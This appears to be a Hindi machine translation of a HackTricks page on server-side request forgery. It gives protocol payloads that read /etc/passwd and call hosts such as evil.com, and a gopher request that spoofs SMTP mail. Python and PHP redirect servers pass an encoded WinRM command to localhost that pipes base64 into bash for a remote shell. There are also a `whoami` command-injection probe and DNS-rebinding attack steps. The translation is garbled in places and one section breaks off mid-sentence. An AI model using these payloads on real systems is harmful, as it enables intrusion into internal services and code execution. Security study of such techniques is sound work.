.. | ||
cloud-ssrf.md | ||
README.md | ||
ssrf-vulnerable-platforms.md | ||
url-format-bypass.md |
SSRF (सर्वर साइड रिक्वेस्ट फोर्जरी)
Trickest का उपयोग करें और आसानी से वर्कफ़्लो बनाएं और विश्व के सबसे उन्नत समुदाय उपकरणों द्वारा कार्यों को स्वचालित करें।
आज ही पहुंच प्राप्त करें:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- क्या आप किसी साइबर सुरक्षा कंपनी में काम करते हैं? क्या आप अपनी कंपनी को HackTricks में विज्ञापित देखना चाहते हैं? या क्या आपको PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग करने का अधिकार चाहिए? सदस्यता योजनाएं की जांच करें!
- The PEASS Family की खोज करें, हमारा विशेष NFT संग्रह
- आधिकारिक PEASS & HackTricks swag प्राप्त करें
- शामिल हों 💬 Discord समूह या टेलीग्राम समूह या मुझे Twitter 🐦@carlospolopm** का पालन करें**.
- अपने हैकिंग ट्रिक्स साझा करें, PRs के माध्यम से hacktricks repo और hacktricks-cloud repo को सबमिट करके.
सर्वर-साइड रिक्वेस्ट फोर्जरी (जिसे SSRF के रूप में भी जाना जाता है) एक वेब सुरक्षा संकट है जो एक हमलावर को अपनी पसंद के अनिश्चित डोमेन पर HTTP अनुरोध बनाने के लिए सर्वर-साइड एप्लिकेशन को प्रेरित करता है। (यहां से)[https://portswigger.net/web-security/ssrf]
SSRF को कैप्चर करें
पहली चीज जो आपको करनी होगी, वह यह है कि आपके द्वारा प्रेरित एक SSRF इंटरेक्शन को कैप्चर करें। HTTP या DNS इंटरेक्शन को कैप्चर करने के लिए आप निम्नलिखित उपकरणों का उपयोग कर सकते हैं:
- Burpcollab
- pingb
- canarytokens
- interractsh
- http://webhook.site
- https://github.com/teknogeek/ssrf-sheriff
व्हाइटलिस्टेड डोमेन बाईपास
आमतौर पर आपको पाया जाएगा कि SSRF केवल निश्चित व्हाइटलिस्टेड डोमेन या URL में काम कर रहा है। आपके पास निम्नलिखित पृष्ठ में एक टेक्निक का संकलन है जिसका प्रयास करें व्हाइटलिस्ट को बाईपास करने के लिए:
{% content-ref url="url-format-bypass.md" %} url-format-bypass.md {% endcontent-ref %}
ओपन रीडायरेक्ट के माध्यम से बाईपास करें
यदि सर्वर सही ढंग से संरक्षित है, तो आप वेब पृष्ठ के अंदर ओपन रीडायरेक्ट का उपयोग करके सभी प्रतिबंधों को बाईपास कर सकते हैं। क्योंकि वेबपेज एक ही डोमेन के लिए SSRF की अनुमति देगा और शायद रीडायरेक्ट का पालन करेगा, आप ओपन रीडायरेक्ट का शोषण करके सर्वर को किसी भी संसाधन तक पहुंचने के लिए उपयोग कर सकते हैं।
यहां अधिक जानें: https://portswigger.net/web-security/ssrf
प्रोटोकॉल
file://
file:///etc/passwd
dict://
DICT URL योजना का उपयोग DICT प्रोटोकॉल का उपयोग करके परिभाषाओं या शब्द सूचियों को संदर्भित करने के लिए किया जाता है:
dict://<user>;<auth>@<host>:<port>/d:<word>:<database>:<n>
ssrf.php?url=dict://attacker:11111/
SFTP://
एक सुरक्षित शैल में सुरक्षित फ़ाइल संचार के लिए उपयोग होने वाला नेटवर्क प्रोटोकॉल है।
ssrf.php?url=sftp://evil.com:11111/
TFTP://
त्रिवियल फ़ाइल ट्रांसफ़र प्रोटोकॉल, UDP पर काम करता है।
ssrf.php?url=tftp://evil.com:12346/TESTUDPPACKET
LDAP://
लाइटवेट डायरेक्टरी एक्सेस प्रोटोकॉल। यह एक एप्लिकेशन प्रोटोकॉल है जो एक आईपी नेटवर्क पर वितरित डायरेक्टरी सूचना सेवा को प्रबंधित और एक्सेस करने के लिए उपयोग किया जाता है।
ssrf.php?url=ldap://localhost:11211/%0astats%0aquit
Gopher://
इस प्रोटोकॉल का उपयोग करके आप सर्वर को भेजने के लिए IP, पोर्ट और बाइट को निर्दिष्ट कर सकते हैं। फिर, आप मूल रूप से किसी भी TCP सर्वर के साथ एक SSRF का उपयोग करके उपयोग कर सकते हैं (लेकिन आपको पहले सेवा के साथ बात करने का तरीका पता होना चाहिए)।
भाग्यशाली रूप से, आप Gopherus का उपयोग करके कई सेवाओं के लिए payloads बना सकते हैं। इसके अलावा, remote-method-guesser का उपयोग Java RMI सेवाओं के लिए gopher payloads बनाने के लिए किया जा सकता है।
Gopher smtp
ssrf.php?url=gopher://127.0.0.1:25/xHELO%20localhost%250d%250aMAIL%20FROM%3A%3Chacker@site.com%3E%250d%250aRCPT%20TO%3A%3Cvictim@site.com%3E%250d%250aDATA%250d%250aFrom%3A%20%5BHacker%5D%20%3Chacker@site.com%3E%250d%250aTo%3A%20%3Cvictime@site.com%3E%250d%250aDate%3A%20Tue%2C%2015%20Sep%202017%2017%3A20%3A26%20-0400%250d%250aSubject%3A%20AH%20AH%20AH%250d%250a%250d%250aYou%20didn%27t%20say%20the%20magic%20word%20%21%250d%250a%250d%250a%250d%250a.%250d%250aQUIT%250d%250a
will make a request like
HELO localhost
MAIL FROM:<hacker@site.com>
RCPT TO:<victim@site.com>
DATA
From: [Hacker] <hacker@site.com>
To: <victime@site.com>
Date: Tue, 15 Sep 2017 17:20:26 -0400
Subject: Ah Ah AHYou didn't say the magic word !
.
QUIT
गोफर एचटीटीपी
#For new lines you can use %0A, %0D%0A
gopher://<server>:8080/_GET / HTTP/1.0%0A%0A
gopher://<server>:8080/_POST%20/x%20HTTP/1.0%0ACookie: eatme%0A%0AI+am+a+post+body
गोफर SMTP - 1337 को बैक कनेक्ट करें
{% code title="redirect.php" %}
<?php
header("Location: gopher://hack3r.site:1337/_SSRF%0ATest!");
?>Now query it.
https://example.com/?q=http://evil.com/redirect.php.
{% endcode %}
SMTP
https://twitter.com/har1sec/status/1182255952055164929 से:
1. smtp localhost:25 पर SSRF के साथ कनेक्ट करें
2. पहली पंक्ति से आंतरिक डोमेन नाम प्राप्त करें 220 http://blabla.internaldomain.com ESMTP Sendmail
3. github पर खोजें http://internaldomain.com , सबडोमेन्स प्राप्त करें
4. कनेक्ट करें
Curl URL globbing - WAF bypass
यदि SSRF curl द्वारा निष्पादित किया जाता है, तो curl में URL globbing नामक एक विशेषता होती है जो WAFs को बाइपास करने के लिए उपयोगी हो सकती है। उदाहरण के लिए इस writeup में आप file
प्रोटोकॉल के माध्यम से पाथ ट्रावर्सल के लिए इस उदाहरण को खोज सकते हैं:
file:///app/public/{.}./{.}./{app/public/hello.html,flag.txt}
SSRF अनुरोधों को कैप्चर करें
- Burp Collaborator
- http://requestrepo.com/
- https://app.interactsh.com/
- https://github.com/stolenusername/cowitness
Referrer हेडर के माध्यम से SSRF
कुछ ऐप्लिकेशन सर्वर-साइड विश्लेषण सॉफ़्टवेयर का उपयोग करते हैं जो आगंतुकों का पता लगाता है। यह सॉफ़्टवेयर आमतौर पर अनुरोधों में रेफ़रर हेडर को लॉग करता है, क्योंकि यह आगंतुकों से आने वाले लिंक को ट्रैक करने के लिए विशेष रुचि का विषय होता है। अक्सर विश्लेषण सॉफ़्टवेयर वास्तव में रेफ़रर हेडर में दिखने वाले किसी तृतीय-पक्ष URL को भी विज़िट करेगा। यह आमतौर पर उपयोग किया जाता है ताकि आने वाले लिंक में उपयोग किए जाने वाले एंकर पाठ सहित रेफ़रर साइट की सामग्री का विश्लेषण किया जा सके। इस परिणामस्वरूप, रेफ़रर हेडर अक्सर SSRF संरचना के लिए उपयोगी होता है।
इस तरह के "छिपे हुए" संरचनाओं का पता लगाने के लिए आप बर्प के प्लगइन "Collaborator Everywhere" का उपयोग कर सकते हैं।
प्रमाणपत्र से SNI डेटा के माध्यम से SSRF
एक ऐसी सरल गलतिफहमी जो आपको किसी भी बैकएंड से संपर्क करने की अनुमति देगी, ऐसा कुछ दिखेगा:
stream {
server {
listen 443;
resolver 127.0.0.11;
proxy_pass $ssl_preread_server_name:443;
ssl_preread on;
}
}
यहां, SNI फ़ील्ड का मान सीधे बैकएंड का पता के रूप में उपयोग किया जाता है।
इस असुरक्षित कॉन्फ़िगरेशन के साथ, हम SSRF दुरुपयोग को सरलता से उपयोग कर सकते हैं, सीधे SNI फ़ील्ड में इच्छित IP या डोमेन नाम को निर्दिष्ट करके। उदाहरण के लिए, निम्नलिखित कमांड Nginx को internal.host.com से कनेक्ट करने के लिए मजबूर करेगी:
openssl s_client -connecttarget.com:443 -servername "internal.host.com" -crlf
Wget फ़ाइल अपलोड
कमांड इंजेक्शन के साथ SSRF
ऐसा प्रयास करने में लायक हो सकता है: url=http://3iufty2q67fuy2dew3yug4f34.burpcollaborator.net?`whoami`
PDF रेंडरिंग
यदि वेब पेज स्वचालित रूप से एक PDF बना रहा है जिसमें आपने कुछ जानकारी प्रदान की है, तो आप कुछ JS डाल सकते हैं जो PDF निर्माता खुद (सर्वर) द्वारा प्रयोज्य होगा जबकि PDF बनाते समय और आप SSRF का दुरुपयोग कर सकेंगे। अधिक जानकारी यहां देखें.
SSRF से DoS तक
एकाधिक सत्र बनाएं और सत्रों से SSRF का दुरुपयोग करके भारी फ़ाइलें डाउनलोड करने का प्रयास करें।
SSRF PHP फ़ंक्शन
{% content-ref url="../../network-services-pentesting/pentesting-web/php-tricks-esp/php-ssrf.md" %} php-ssrf.md {% endcontent-ref %}
SSRF गोफर को रीडायरेक्ट करें
कुछ उत्पादनों के लिए आपको रीडायरेक्ट प्रतिक्रिया भेजनी हो सकती है (संभवतः गोफर जैसे एक अलग प्रोटोकॉल का उपयोग करने के लिए)। यहां आपको रीडायरेक्ट के साथ प्रतिक्रिया देने के लिए विभिन्न पायथन कोड हैं:
# First run: openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
from http.server import HTTPServer, BaseHTTPRequestHandler
import ssl
class MainHandler(BaseHTTPRequestHandler):
def do_GET(self):
print("GET")
self.send_response(301)
self.send_header("Location", "gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20%31%30%2e%31%30%2e%31%31%2e%31%31%37%3a%35%39%38%36%0d%0a%55%73%65%72%2d%41%67%65%6e%74%3a%20%70%79%74%68%6f%6e%2d%72%65%71%75%65%73%74%73%2f%32%2e%32%35%2e%31%0d%0a%41%63%63%65%70%74%2d%45%6e%63%6f%64%69%6e%67%3a%20%67%7a%69%70%2c%20%64%65%66%6c%61%74%65%0d%0a%41%63%63%65%70%74%3a%20%2a%2f%2a%0d%0a%43%6f%6e%6e%65%63%74%69%6f%6e%3a%20%63%6c%6f%73%65%0d%0a%43%6f%6e%74%65%6e%74%2d%54%79%70%65%3a%20%61%70%70%6c%69%63%61%74%69%6f%6e%2f%73%6f%61%70%2b%78%6d%6c%3b%63%68%61%72%73%65%74%3d%55%54%46%2d%38%0d%0a%43%6f%6e%74%65%6e%74%2d%4c%65%6e%67%74%68%3a%20%31%37%32%38%0d%0a%0d%0a%3c%73%3a%45%6e%76%65%6c%6f%70%65%20%78%6d%6c%6e%73%3a%73%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%33%2f%30%35%2f%73%6f%61%70%2d%65%6e%76%65%6c%6f%70%65%22%20%78%6d%6c%6e%73%3a%61%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%22%20%78%6d%6c%6e%73%3a%68%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%69%6e%64%6f%77%73%2f%73%68%65%6c%6c%22%20%78%6d%6c%6e%73%3a%6e%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%39%2f%65%6e%75%6d%65%72%61%74%69%6f%6e%22%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%6d%69%63%72%6f%73%6f%66%74%2e%63%6f%6d%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%77%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%6d%61%6e%2f%31%2f%77%73%6d%61%6e%2e%78%73%64%22%20%78%6d%6c%6e%73%3a%78%73%69%3d%22%68%74%74%70%3a%2f%2f%77%77%77%2e%77%33%2e%6f%72%67%2f%32%30%30%31%2f%58%4d%4c%53%63%68%65%6d%61%22%3e%0a%20%20%20%3c%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%20%20%20%3c%61%3a%54%6f%3e%48%54%54%50%3a%2f%2f%31%39%32%2e%31%36%38%2e%31%2e%31%3a%35%39%38%36%2f%77%73%6d%61%6e%2f%3c%2f%61%3a%54%6f%3e%0a%20%20%20%20%20%20%3c%77%3a%52%65%73%6f%75%72%63%65%55%52%49%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%3c%2f%77%3a%52%65%73%6f%75%72%63%65%55%52%49%3e%0a%20%20%20%20%20%20%3c%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%20%20%20%3c%61%3a%41%64%64%72%65%73%73%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%78%6d%6c%73%6f%61%70%2e%6f%72%67%2f%77%73%2f%32%30%30%34%2f%30%38%2f%61%64%64%72%65%73%73%69%6e%67%2f%72%6f%6c%65%2f%61%6e%6f%6e%79%6d%6f%75%73%3c%2f%61%3a%41%64%64%72%65%73%73%3e%0a%20%20%20%20%20%20%3c%2f%61%3a%52%65%70%6c%79%54%6f%3e%0a%20%20%20%20%20%20%3c%61%3a%41%63%74%69%6f%6e%3e%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%2f%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%3c%2f%61%3a%41%63%74%69%6f%6e%3e%0a%20%20%20%20%20%20%3c%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%3e%31%30%32%34%30%30%3c%2f%77%3a%4d%61%78%45%6e%76%65%6c%6f%70%65%53%69%7a%65%3e%0a%20%20%20%20%20%20%3c%61%3a%4d%65%73%73%61%67%65%49%44%3e%75%75%69%64%3a%30%41%42%35%38%30%38%37%2d%43%32%43%33%2d%30%30%30%35%2d%30%30%30%30%2d%30%30%30%30%30%30%30%31%30%30%30%30%3c%2f%61%3a%4d%65%73%73%61%67%65%49%44%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%50%54%31%4d%33%30%53%3c%2f%77%3a%4f%70%65%72%61%74%69%6f%6e%54%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%77%3a%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%70%3a%44%61%74%61%4c%6f%63%61%6c%65%20%78%6d%6c%3a%6c%61%6e%67%3d%22%65%6e%2d%75%73%22%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%66%61%6c%73%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%4f%70%74%69%6f%6e%53%65%74%20%73%3a%6d%75%73%74%55%6e%64%65%72%73%74%61%6e%64%3d%22%74%72%75%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%20%20%20%20%20%20%3c%77%3a%53%65%6c%65%63%74%6f%72%20%4e%61%6d%65%3d%22%5f%5f%63%69%6d%6e%61%6d%65%73%70%61%63%65%22%3e%72%6f%6f%74%2f%73%63%78%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%3e%0a%20%20%20%20%20%20%3c%2f%77%3a%53%65%6c%65%63%74%6f%72%53%65%74%3e%0a%20%20%20%3c%2f%73%3a%48%65%61%64%65%72%3e%0a%20%20%20%3c%73%3a%42%6f%64%79%3e%0a%20%20%20%20%20%20%3c%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%20%78%6d%6c%6e%73%3a%70%3d%22%68%74%74%70%3a%2f%2f%73%63%68%65%6d%61%73%2e%64%6d%74%66%2e%6f%72%67%2f%77%62%65%6d%2f%77%73%63%69%6d%2f%31%2f%63%69%6d%2d%73%63%68%65%6d%61%2f%32%2f%53%43%58%5f%4f%70%65%72%61%74%69%6e%67%53%79%73%74%65%6d%22%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%63%6f%6d%6d%61%6e%64%3e%65%63%68%6f%20%2d%6e%20%59%6d%46%7a%61%43%41%74%61%53%41%2b%4a%69%41%76%5a%47%56%32%4c%33%52%6a%63%43%38%78%4d%43%34%78%4d%43%34%78%4e%43%34%78%4d%53%38%35%4d%44%41%78%49%44%41%2b%4a%6a%45%3d%20%7c%20%62%61%73%65%36%34%20%2d%64%20%7c%20%62%61%73%68%3c%2f%70%3a%63%6f%6d%6d%61%6e%64%3e%0a%20%20%20%20%20%20%20%20%20%3c%70%3a%74%69%6d%65%6f%75%74%3e%30%3c%2f%70%3a%74%69%6d%65%6f%75%74%3e%0a%20%20%20%20%20%20%3c%2f%70%3a%45%78%65%63%75%74%65%53%68%65%6c%6c%43%6f%6d%6d%61%6e%64%5f%49%4e%50%55%54%3e%0a%20%20%20%3c%2f%73%3a%42%6f%64%79%3e%0a%3c%2f%73%3a%45%6e%76%65%6c%6f%70%65%3e%0a")
```python
self.end_headers()
httpd = HTTPServer(('0.0.0.0', 443), MainHandler)
httpd.socket = ssl.wrap_socket(httpd.socket, certfile="server.pem", server_side=True)
httpd.serve_forever()
यहां आप एसएसएल प्रोटोकॉल का उपयोग करके सर्वर को सुरक्षित करने के लिए सर्वर प्रमाणपत्र (server.pem
) का उपयोग कर रहे हैं। यह सर्वर निरंतर सेवा प्रदान करेगा और MainHandler
को उपयोग करके आगंतुकों के अनुरोधों का प्रतिसाद देगा।
from flask import Flask, redirect
from urllib.parse import quote
app = Flask(__name__)
@app.route('/')
def root():
return redirect('gopher://127.0.0.1:5985/_%50%4f%53%54%20%2f%77%73%6d%61%6e%20%48%54%54%50%2f%31%2e%31%0d%0a%48%6f%73%74%3a%20', code=301)
if __name__ == "__main__":
app.run(ssl_context='adhoc', debug=True, host="0.0.0.0", port=8443)
Trickest का उपयोग करें और आसानी से वर्कफ़्लो बनाएं और स्वचालित करें, जो दुनिया के सबसे उन्नत समुदाय उपकरणों द्वारा संचालित होते हैं।
आज ही पहुंच प्राप्त करें:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
DNS Rebidding CORS/SOP बाईपास
यदि आपको CORS/SOP के कारण स्थानीय IP से सामग्री निकालने में समस्या हो रही है, तो DNS Rebidding का उपयोग इस प्रतिबंध को दूर करने के लिए किया जा सकता है:
{% content-ref url="../cors-bypass.md" %} cors-bypass.md {% endcontent-ref %}
स्वचालित DNS Rebidding
Singularity of Origin
एक टूल है जो DNS rebinding हमलों को करने के लिए उपयोग होता है। इसमें आवश्यक घटक शामिल हैं जो हमले करने वाले सर्वर DNS नाम के IP पते को लक्ष्य मशीन के IP पते से बाइंड करने और लक्ष्य मशीन पर संक्रमित सॉफ़्टवेयर का शोधन करने के लिए हमले के भोजन को सेवा करने के लिए आवश्यक होते हैं।
इसके अलावा, देखें सार्वजनिक रूप से चल रहे सर्वर को http://rebind.it/singularity.html में।
DNS Rebidding + TLS सत्र ID/सत्र टिकट
आवश्यकताएं:
- SSRF
- आउटबाउंड TLS सत्र
- स्थानीय पोर्ट पर सामग्री
हमला:
- उपयोगकर्ता/बॉट से कहें कि वह हमलावर द्वारा नियंत्रित डोमेन तक पहुंचें
- DNS का TTL 0 सेकंड है (इसलिए पीड़ित जल्दी ही डोमेन के IP की जांच करेगा)
- पीड़ित और हमलावर द्वारा बनाए गए डोमेन के बीच एक TLS कनेक्शन बनाया जाता है। हमलावर आपत्तिजनक सॉफ़्टवेयर को शोषित करने के लिए सत्र ID या सत्र टिकट में भोजन को प्रस्तुत करता है।
- डोमेन अपने आप को असीमित पुनर्निर्देशन के खिलाफ पुनर्निर्देशित करेगा। इसका उद्देश्य यह है कि उपयोगकर्ता/बॉट डोमेन तक पहुंचें जब तक वह डोमेन के लिए फिर से एक DNS अनुरोध करता है।
- DNS अनुरोध में एक निजी IP पता अब दिया जाता है (उदाहरण के लिए 127.0.0.1)
- उपयोगकर्ता/बॉट TLS कनेक्शन को पुनर्स्थापित करने की कोशिश करेगा और इसके लिए वह सत्र ID/टिकट ID (जहां हमलावर का भोजन था) भेजेगा। तो बधाई हो, आपने सफलतापूर्वक पूछ लिया है कि उपयोगकर्ता/बॉट खुद को हमला करें।
ध्यान दें कि इस हमले के दौरान, यदि आप localhost:11211 (मेमकैश) पर हमला करना चाहते हैं, तो आपको पीड़ित को www.attacker.com:11211 के साथ प्राथमिक कनेक्शन स्थापित करने की आवश्यकता होगी (पोर्ट हमेशा समान होना चाहिए)।
इस हमले को करने के लिए आप इस टूल का उपयोग कर सकते हैं: https://github.com/jmdx/TLS-poison/
अधिक जानकारी के लिए इस हमले को समझाने वाले टॉक पर नज़र डालें: https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference
अंधा SSRF
अंधा SSRF और अंधा नहीं SSRF के बीच अंतर यह है कि अंधे में आप SSRF अनुरोध के प्रतिक्रिया को नहीं देख सकते हैं। फिर, इसे उत्पन्न करना कठिन हो जाता है क्योंकि आ
- आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
- 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह में शामिल हों या मुझे ट्विटर पर फ़ॉलो करें 🐦@carlospolopm.
- अपने हैकिंग ट्रिक्स को सबमिट करके hacktricks रेपो और hacktricks-cloud रेपो में साझा करें।
Trickest का उपयोग करें और आसानी से वर्ल्ड के सबसे उन्नत समुदाय उपकरणों द्वारा संचालित ऑटोमेटेड वर्कफ़्लो बनाएं।
आज ही पहुंच प्राप्त करें:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}